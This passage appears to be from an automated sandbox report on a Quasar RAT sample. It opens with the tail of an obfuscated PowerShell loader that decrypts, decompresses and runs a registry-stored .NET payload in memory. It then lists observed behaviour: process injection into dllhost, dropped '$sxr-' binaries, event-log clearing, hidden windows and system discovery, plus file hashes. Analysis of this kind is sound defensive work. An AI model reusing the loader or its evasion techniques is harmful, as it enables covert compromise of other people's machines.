'')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{e501f1c1-975e-43a2-8573-35497546766a}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{28beff50-36c5-4596-8c14-43feb29a3939}

Network

Country Destination Domain Proto
US 8.8.8.8:53 26.211.222.173.in-addr.arpa udp

Files

memory/1468-0-0x00007FFA60383000-0x00007FFA60384000-memory.dmp

memory/1468-1-0x0000019E40000000-0x0000019E401BE000-memory.dmp

memory/1468-2-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-3-0x0000019E5B6D0000-0x0000019E5B7B0000-memory.dmp

memory/1468-4-0x0000019E5BA60000-0x0000019E5BC04000-memory.dmp

memory/1468-5-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-10-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/4640-11-0x0000025B7A940000-0x0000025B7A962000-memory.dmp

memory/4640-15-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/4640-14-0x0000025B7AC30000-0x0000025B7ACA6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_izbbwn40.3f3.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4640-16-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/4640-31-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

memory/1468-58-0x00007FFA60383000-0x00007FFA60384000-memory.dmp

memory/1468-63-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/4640-64-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/4588-65-0x0000029F18000000-0x0000029F18024000-memory.dmp

memory/4588-68-0x00007FFA7CE90000-0x00007FFA7D06B000-memory.dmp

memory/4588-69-0x00007FFA7CDA0000-0x00007FFA7CE4E000-memory.dmp

memory/4640-70-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/4588-71-0x0000029F182F0000-0x0000029F18D40000-memory.dmp

memory/4588-73-0x0000029F18D40000-0x0000029F18DE6000-memory.dmp

memory/4588-88-0x0000029F18DF0000-0x0000029F18E46000-memory.dmp

memory/4588-89-0x0000029F18E50000-0x0000029F18EA8000-memory.dmp

memory/4588-90-0x0000029F18EB0000-0x0000029F18ED2000-memory.dmp

memory/4588-93-0x00007FFA7CE90000-0x00007FFA7D06B000-memory.dmp

memory/4588-101-0x0000029F19160000-0x0000029F1916A000-memory.dmp

memory/656-102-0x0000000140000000-0x0000000140004000-memory.dmp

memory/656-103-0x0000000140000000-0x0000000140004000-memory.dmp

memory/1632-105-0x0000000000400000-0x0000000000406000-memory.dmp

memory/1632-106-0x0000000000400000-0x0000000000406000-memory.dmp

C:\Windows\$sxr-mshta.exe

MD5 98447a7f26ee9dac6b806924d6e21c90
SHA1 a67909346a56289b7087821437efcaa51da3b083
SHA256 c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed
SHA512 c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b

C:\Windows\$sxr-cmd.exe

MD5 94912c1d73ade68f2486ed4d8ea82de6
SHA1 524ab0a40594d2b5f620f542e87a45472979a416
SHA256 9f7ebb79def0bf8cccb5a902db11746375af3fe618355fe5a69c69e4bcd50ac9
SHA512 f48a3b7a2e6426c0091bb159599921b8e4644c8ae83a2a2a82efc9d3e21e4e343d77339917d8aabed6d8025142a2a8e74bf1fa759edb6146bc6e39fbece9e05d

memory/3928-165-0x00007FFA7CDA0000-0x00007FFA7CE4E000-memory.dmp

memory/3928-164-0x00007FFA7CE90000-0x00007FFA7D06B000-memory.dmp

memory/4588-171-0x00007FFA7CDA0000-0x00007FFA7CE4E000-memory.dmp

memory/4588-170-0x00007FFA7CE90000-0x00007FFA7D06B000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-08-18 13:35

Reported

2024-08-18 13:37

Platform

win10v2004-20240802-en

Max time kernel

60s

Max time network

56s

Command Line

winlogon.exe

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 4124 created 4332 N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\dllhost.exe
PID 5264 created 6980 N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\dllhost.exe
PID 6924 created 6212 N/A C:\Windows\system32\WerFault.exe C:\Windows\System32\dllhost.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation C:\Windows\$sxr-mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A

Indicator Removal: Clear Windows Event Logs

defense_evasion
Description Indicator Process Target
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A

Hide Artifacts: Hidden Window

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2248 set thread context of 3512 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2248 set thread context of 4516 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 set thread context of 2336 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 set thread context of 3132 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 set thread context of 4864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 set thread context of 3024 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 2248 set thread context of 5412 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2248 set thread context of 5472 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 set thread context of 1168 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 set thread context of 6640 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 set thread context of 6728 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 set thread context of 4408 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 set thread context of 1072 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 set thread context of 4332 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 set thread context of 6944 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 set thread context of 6980 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1452 set thread context of 6212 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1452 set thread context of 6612 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File opened for modification C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File created C:\Windows\$sxr-mshta.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File opened for modification C:\Windows\$sxr-mshta.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File created C:\Windows\$sxr-cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File opened for modification C:\Windows\$sxr-cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File opened for modification C:\Windows\Logs\CBS\CBS.log C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp C:\Windows\SysWOW64\WerFault.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\$sxr-mshta.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
